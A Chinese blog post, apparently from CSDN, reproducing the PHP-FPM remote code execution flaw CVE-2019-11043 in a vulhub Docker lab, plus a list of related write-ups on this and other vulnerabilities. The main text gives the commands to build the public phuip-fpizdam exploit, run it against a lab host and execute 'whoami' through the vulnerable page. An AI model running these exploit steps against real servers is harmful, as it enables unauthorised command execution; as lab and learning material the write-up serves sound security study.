PHP-fpm 远程代码执行漏洞复现(CVE-2019-11043)

最新推荐文章于 2024-05-23 18:33:01 发布
最新推荐文章于 2024-05-23 18:33:01 发布
阅读量409 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/106930560
版权

PHP-fpm 远程代码执行漏洞复现(CVE-2019-11043)

环境搭建

启动docker

systemctl start docker

获取vulhub

git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git

进入对应目录

cd vulhub/php/CVE-2019-11043/

启动容器

docker-compose up -d

查看容器

docker ps

在这里插入图片描述
访问http://127.0.0.1:8080/
在这里插入图片描述
安装go环境

apt-get install golang -y

下载exp

git clone --depth=1 https://hub.fastgit.org/neex/phuip-fpizdam.git

生成exp

cd phuip-fpizdam
go build

因为国内无法访问golang.org所以需要想办法下载

漏洞复现

./phuip-fpizdam http://192.168.164.158:8080/index.php

curl http://192.168.164.158:8080/index.php?a=whoami

在这里插入图片描述

参考文章

https://vulhub.org/#/environments/php/CVE-2019-11043/
https://www.runoob.com/go/go-environment.html
https://github.com/neex/phuip-fpizdam

whojoe
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-11043PHP远程代码执行漏洞复现
永远是少年
12-11 2093
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043PHP远程代码执行漏洞复现。 一、CVE-2019-11043PHP远程代码执行漏洞)简介 二、CVE-2019-11043PHP远程代码执行漏洞漏洞环境搭建 三、CVE-2019-11043PHP远程代码执行漏洞漏洞利用工具安装 四、CVE-2019-11043PHP远程代码执行漏洞复现
buuctf [PHP]CVE-2019-11043
qq_1873822的博客
03-25 457
漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/].php(/|KaTeX parse error: Can't use function '\.' in math mode at position 38: …pa
漏洞复现CVE-2019-11043PHP远程代码执行漏洞)信息安全论文_含漏洞复现完整过程_含Linux环境go语言编译环境安装
最新发布
Thmos_vader的博客
05-23 1271
CVE-2019-11043漏洞PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。 该漏洞普遍出现在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间。
CVE-2019-11043PHP远程代码执行漏洞
m0_51468027的博客
02-12 8891
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
CLTPHP 漏洞
a674212706的博客
07-25 575
前言 awd小组的第一次训练 0x01 首先看一下主界面 使用的应该是PHP模板,随便翻一下找到一个注册界面 随便注册一个用户,登陆后在设置里找到一个上传点 上传我们的一句话木马 查看返回包,上传成功 访问失败,猜测返回路径可能不是绝对路径 通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success! 菜刀连接 0x02 换个思路,网...
CVE-2019-11043 Nginx PHP 远程代码执行漏洞复现----自我学习
Ping_Pig的博客
10-27 3759
漏洞简介: 来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞,9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用,危害较大 漏洞概述: Nginx上fas...
PHP-CGI远程代码执行漏洞分析与防范
12-20
PHP-CGI远程代码执行漏洞分析与防范】 PHP-CGI远程代码执行漏洞是针对PHP运行模式中的CGI接口的一种安全缺陷,可能导致攻击者能够在服务器上执行任意代码,从而获取服务器控制权。该漏洞主要出现在PHP的CGI sapi...
解决Linux下php-fpm进程过多导致内存耗尽问题
12-20
在Linux系统中,php-fpm(FastCGI Process Manager)是PHP的一个重要组件,它用于管理PHP进程池,处理来自Web服务器(如Nginx)的请求。当php-fpm进程过多时,可能会导致内存耗尽,从而影响到其他服务,如数据库服务...
PHP-FPM实现性能优化
10-22
在Nginx上运行PHP应用程序时,通常会将请求转发给PHP-FPM进行解析和执行。从PHP 5.4版本开始,PHP-FPM被集成到PHP源码中,使得安装和使用更加方便。 ### 一、安装PHP-FPM 在编译PHP时,需要添加`--enable-fpm`参数...
解决php-fpm.service not found问题的办法
01-21
前言 本文给大家详细介绍了解决php-fpm.service not found...然后准备执行 service php-fpm start 时出错了 错误如下 Failed to start php-fpm.service: Unit php-fpm.service not found. 提示 php-fpm.servi
php性能分析之php-fpm执行日志slow log用法浅析
12-30
本文实例讲述了php性能分析之php-fpm执行日志slow log用法。分享给大家供大家参考,具体如下: 众所周知,mysql有slow query log,根据慢查询...<value name=slowlog>logs/php-fpm-slowlog.log</value> PHP 5.3.3 之
GhostScript 沙箱绕过(命令执行漏洞CVE-2018-16509)
黑白的博客
12-22 1255
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
PHP远程代码执行漏洞CVE-2019-11043分析
五侠的博客
05-24 764
PHP远程代码执行漏洞CVE-2019-11043分析 CVE-2019-11043是一种2019年出现的PHP远程代码执行漏洞 Nginx上fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致PATH_INFO为空,最终可导致任意代码执行。 利用条件 PHP版本7及fastcgi协议 PHP7以上,使用fpm形式处理请求,需要使用fastcgi协议,并且利用nginx的正则实现pathinfo和filename分离,例如:inidex.php/artic
CVE-2019-11043 PHP远程代码执行
qq_46804551的博客
02-05 181
CVE-2019-11043 PHP远程代码执行漏洞是某比赛解决一道CTF题目时发现,向目标服务器URL发送%0a符号时,服务返回异常发现的漏洞 2019年9月26日,PHP官方发布漏洞通告,其中指出,使用Nginx+php-fpm的服务器,在部分配置下,存在远程代码执行漏洞,且该配置已被广泛使用,危害较大,影响较为广泛。 漏洞环境: git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6279
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
CVE-2019-14234——SQL注入漏洞
战神/calmness的博客
11-21 1674
CVE-2019-14234:Django JSONField SQL注入漏洞复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 该漏洞需要开发者使用了JSONField/HStoreField,且用户可控queryset查询时的键名,在键名的位置注入SQL语句。 漏洞概述: Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏...
cve漏洞复现 php,PHP 反序列化漏洞学习及CVE-2016-7124漏洞复现
weixin_39780255的博客
03-10 227
序列化与反序列化了解serialize ()serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。简单来讲,就是将对象转化为可以传输的字符串,字符串中存储着对象的变量、类型等。举个例子:test.phpclass test{public $name = "wcute";public $age = "18";}$fairy = new test();ech...
php-fpm远程使用,Nginx的PHP-FPM远程代码执行 漏洞复现
weixin_39616477的博客
03-19 212
在9月14日至18举办的RealWorldCTF中,国外安全研究员AndrewDanau在解决一道CTF题目时发现,向目标服务器URL发送%0a符号时,服务返回异常,疑似存在漏洞。Nginx上fastcgi_split_path_info在处理带有%0a的请求时,会因为遇到换行符\n导致PATH_INFO为空。而php-fpm在处理PAT...
php-fpm在nginx特定环境下的任意代码执行漏洞CVE-2019-11043
无心的博客
10-26 1680
目录 0x01 漏洞介绍 0x02 漏洞影响 0x03 漏洞复现 0x01 漏洞介绍 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 符号时,服务返回异常,疑似存在漏洞。 在nginx上,fastcgi_split_path_info处理带有 的请求时,会因为遇到换行符n,导致PATH_I...
LAMP+php-fpm服务器+php7.16
01-10
LAMP (Linux, Apache, MySQL, PHP) 是一种流行的网络应用程序解决方案,最近还引入了 php-fpm 服务器 php7.16。当将 Apache 服务器与 php-fpm 服务搭载后,大大增强了高并发性能,弥补了以往的短板。通过创建用户及...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值